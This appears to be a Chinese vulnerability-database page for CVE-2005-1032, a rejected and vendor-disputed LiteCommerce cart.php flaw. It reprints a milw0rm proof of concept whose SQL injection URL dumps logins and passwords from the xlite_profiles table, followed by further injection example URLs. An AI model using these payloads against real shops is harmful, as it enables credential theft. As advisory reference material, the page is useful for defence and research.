CVE-2005-1032
CVSSN/A
发布时间 :2005-04-06 00:00:00
修订时间 :2008-09-10 15:37:47
NMOES    

[原文]** REJECT ** cart.php in LiteCommerce might allow remote attackers to obtain sensitive information via invalid (1) category_id or (2) product_id parameters. NOTE: this issue was originally claimed to be due to SQL injection, but the original researcher is known to be frequently inaccurate with respect to bug type and severity. The vendor has disputed this issue, saying "These reports are credited to malicious person we refused to hire. We have not taken legal action against him only because he is located in India. The vulnerabilites reported can not be reproduced, hence information you provide is contrary to fact." Further investigation by CVE personnel shows that an invalid SQL syntax error could be generated, but it only reveals portions of underlying database structure, which is already available in documentation from the vendor, and it does not appear to lead to path disclosure. Therefore, this issue is not a vulnerability or an exposure, and it probably should be REJECTED.


[CNNVD]CNNVD数据暂缺。


[机译]*拒绝** cart.php在LiteCommerce可能允许远程攻击者获得敏感信息无效(1)CATEGORY_ID或(2)的product_id参数。

- CVSS (基础分值)

CVSS暂不可用

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1032
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1032
(官方数据源) NVD

- 其它链接及资源

- 漏洞信息 (4300)

litecommerce 2004 (category_id) Remote SQL Injection Vulnerability (EDBID:4300)
php webapps
2007-08-21 Verified
0 k1tk4t
N/A [点击下载]
########################################################################
# litecommerce Copyright © 2004 - Remote SQL Injection
# Vendor        : http://www.litecommerce.com/
# Found By      : k1tk4t - k1tk4t[4t]newhack.org
# Location      : Indonesia   --  #newhack[dot]org @irc.dal.net
# Dork          : Powered by LiteCommerce
########################################################################
POC;

http://localhost/cart.php?target=category&category_id=9999)union/**/select/**/concat(login,'-',password)/**/from/**/xlite_profiles/*

jika exploit ini berhasil, anda akan melihat pesan error pada halaman, pesan error yang berisikan informasi kesalahan SQL
sekaligus memberikan informasi "login" dan "password" yang berada pada table xlite_profiles
exploit ini kemungkinan tidak berhasil pada litecommerce terbaru[tidak ada pesan error]
########################################################################
Terimakasih untuk;
str0ke
arioo[nyubicrew] yang telah memberikan link tersebut
xoron,y3dips,mathdule,iFX,x-ace,nyubi,selikoer,k1ngk0ng
dan semua temen2 komunitas security&hacking
-----------------------
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[dot]org
-----------------------
all member echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
semua komunitas hacker&security Indonesia
cintailah bahasa Indonesia

# milw0rm.com [2007-08-21]
		

- 漏洞信息

15313
LiteCommerce cart.php Malformed target Parameter Script Source Disclosure
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality
Exploit Public

- 漏洞描述

LiteCommerce contains a flaw that may lead to an unauthorized information disclosure.  The issue is triggered when an attacker provides malformed data to the 'target' parameter of the cart.php script, which will disclose the source code for the script resulting in a loss of confidentiality.

- 时间线

2005-04-06 Unknow
2005-04-06 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

LiteCommerce Multiple SQL Injection Vulnerabilities
Input Validation Error 13044
Yes No
2005-04-06 12:00:00 2007-08-27 07:12:00
Discovery is credited to Diabolic Crab dcrab <dcrab@hackerscenter.com>.

- 受影响的程序版本

LiteCommerce LiteCommerce

- 漏洞讨论

LiteCommerce is reportedly affected by multiple SQL injection vulnerabilities.

These vulnerabilities could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

All versions of LiteCommerce are considered to be affected at the moment.

- 漏洞利用

An exploit is not required.

The following proof of concept examples are available:

http://www.example.com/test/cart.php?target='PHP_SCRIPT_EXPOSUREPHP_SCRIPT_EXPOSURE

http://www.example.com/test/cart.php?target=category&category_id='SQL_INJECTION

http://www.example.com/test/cart.php?target=product&product_id='SQL_INJECTION&category_id=246

- 解决方案

The vendor released patch 'lc_security_fix_20070824.zip' to address these issues. Please contact the vendor for information on how to obtain and apply this update.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站